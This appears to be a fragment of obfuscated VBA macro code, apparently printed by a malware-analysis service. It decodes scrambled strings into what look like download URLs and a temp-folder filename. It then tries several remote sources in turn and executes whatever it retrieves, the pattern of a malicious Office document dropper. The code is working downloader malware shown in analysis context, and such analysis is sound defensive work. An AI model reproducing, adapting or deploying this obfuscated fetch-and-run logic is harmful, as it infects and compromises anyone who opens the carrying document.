Dim nyTNk As Long
nyTNk = 43
GFhhLzI = "IrRdktJpmeaAUBtpGf/IflQraAKvdHsclEosC2AMYtQfRGzuqxqdtOFXTpKAxAVWQtpogwaU.PTddXTieZ/jWoidKFKlRpLU/GyJbcuswsWGiEkdhzZiMChyxfxAUBcuiKu:5pmOiPthjrEiLGbJTejJlsqwpBayFMYCrnP/xptrCLdfQ.HFpPAQryefqwBozEeWrcSOiNLVkgezRtoVGShQxWUNNrja/urusiVeTeYvktKtgWuxIDaQk"
LFtlv(0) = 113
LFtlv(1) = 6
LFtlv(2) = 6
LFtlv(3) = 8
LFtlv(4) = 132
LFtlv(5) = 19
LFtlv(6) = 19
LFtlv(7) = 18
LFtlv(8) = 35
LFtlv(9) = 50
LFtlv(10) = 133
LFtlv(11) = 73
LFtlv(12) = 6
LFtlv(13) = 80
LFtlv(14) = 9
LFtlv(15) = 80
LFtlv(16) = 11
LFtlv(17) = 31
LFtlv(18) = 6
LFtlv(19) = 5
LFtlv(20) = 35
LFtlv(21) = 73
LFtlv(22) = 8
LFtlv(23) = 22
LFtlv(24) = 19
LFtlv(25) = 70
LFtlv(26) = 35
LFtlv(27) = 2
LFtlv(28) = 4
LFtlv(29) = 8
LFtlv(30) = 2
LFtlv(31) = 10
LFtlv(32) = 31
LFtlv(33) = 31
LFtlv(34) = 19
LFtlv(35) = 38
LFtlv(36) = 47
LFtlv(37) = 2
LFtlv(38) = 95
LFtlv(39) = 47
LFtlv(40) = 12
LFtlv(41) = 63
LFtlv(42) = 19
LFtlv(43) = 35
LFtlv(44) = 60
LFtlv(45) = 242
LFtlv(46) = 249
LFtlv(47) = 172
LFtlv(48) = 126
LFtlv(49) = 134
LFtlv(50) = 8
LFtlv(51) = 149
LFtlv(52) = 214
LFtlv(53) = 80
LFtlv(54) = 161
LFtlv(55) = 74
LFtlv(56) = 248
LFtlv(57) = 55
LFtlv(58) = 209
LFtlv(59) = 102
LFtlv(60) = 123
LFtlv(61) = 1
LFtlv(62) = 58
LFtlv(63) = 51
LFtlv(64) = 183
LFtlv(65) = 112
LFtlv(66) = 18
LFtlv(67) = 47
LFtlv(68) = 63
LFtlv(69) = 164
LFtlv(70) = 235
LFtlv(71) = 157
LFtlv(72) = 67
LFtlv(73) = 178
LFtlv(74) = 206
LFtlv(75) = 53
LFtlv(76) = 53
LFtlv(77) = 147
zhPayWCq = zjU(GFhhLzI, LFtlv, nyTNk)
Dim ggVZNs As String
Dim W As String
Dim KVAO(12) As Long
Dim MRLRx As Long
MRLRx = 4
W = "PEkSNiZwgmXJMZ.rQpjtpXMXvgLTcFhQ"
KVAO(0) = 15
KVAO(1) = 20
KVAO(2) = 10
KVAO(3) = 18
KVAO(4) = 10
KVAO(5) = 2
KVAO(6) = 22
KVAO(7) = 13
KVAO(8) = 23
KVAO(9) = 7
KVAO(10) = 28
KVAO(11) = 18
ggVZNs = zjU(W, KVAO, MRLRx)
MIdtfjH = zCn()
MIdtfjH = MIdtfjH & ggVZNs
Dim OHR As Boolean
If Not OHR Then
OHR = Ox(Wt, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(BfCMB, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(scG, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(jlscQ, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(TFMz, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(eQK, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(nnY, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(nN, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(FTi, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(zhPayWCq, MIdtfjH)
End If
If OHR Then
kJqesH MIdtfjH
End If
End Sub
…

Open this report in the interactive analyzer, or submit your own file for analysis.